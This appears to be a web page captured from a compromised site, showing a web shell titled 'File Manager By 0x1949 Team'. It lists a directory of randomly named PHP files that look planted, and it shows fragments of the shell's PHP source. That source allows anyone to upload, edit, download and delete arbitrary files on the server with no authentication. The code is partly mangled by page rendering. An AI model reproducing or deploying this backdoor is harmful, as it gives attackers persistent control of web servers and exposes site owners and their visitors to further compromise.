File Manager By 0x1949 Team
Files in the directory:
.htaccess
.sys_5a511d0f.inc
.sys_9e366ff1.inc
.well-known
0x19493Q36R9.php
9iaUxovbZd
axv-cp-uhoyGCTe.php
ayrtr.php
cgi-bin
cwjdw.php
error_log
error_log.php
fodwn.php
nncnj.php
pgjtj.php
ploqe.php
ugczp.php
vlqcz.php
wp-class.php
xglja.php
xiewz.php
ypbpk.php
zljqb.php
Upload a File
Upload
Edit File: 0x19493Q36R9.php
File '$filename' has been updated.
"; } break; case 'delete': if (file_exists($path)) { unlink($path); echo "
File '$filename' has been deleted.
"; } break; case 'download': if (file_exists($path)) { header('Content-Type: application/octet-stream'); header('Content-Disposition: attachment; filename="' . $filename . '"'); readfile($path); exit; } break; case 'upload': if (isset($_FILES['file']) && $_FILES['file']['error'] == UPLOAD_ERR_OK) { $uploadedFile = $_FILES['file']; $uploadedFilename = $uploadedFile['name']; $uploadedFilePath = $directory . $uploadedFilename; if (move_uploaded_file($uploadedFile['tmp_name'], $uploadedFilePath)) { echo "
File '$uploadedFilename' has been uploaded.
"; } else { echo "
Error uploading file '$uploadedFilename'.
"; } } break; } } } // Get the list of files in the directory $files = scandir($directory); ?>
File Manager
File Manager By 0x1949 Team
Files in the directory:
" . $file . ""; } } ?>
Upload a File
Upload
Edit File:
Save
Download
Delete
Save
Download
Delete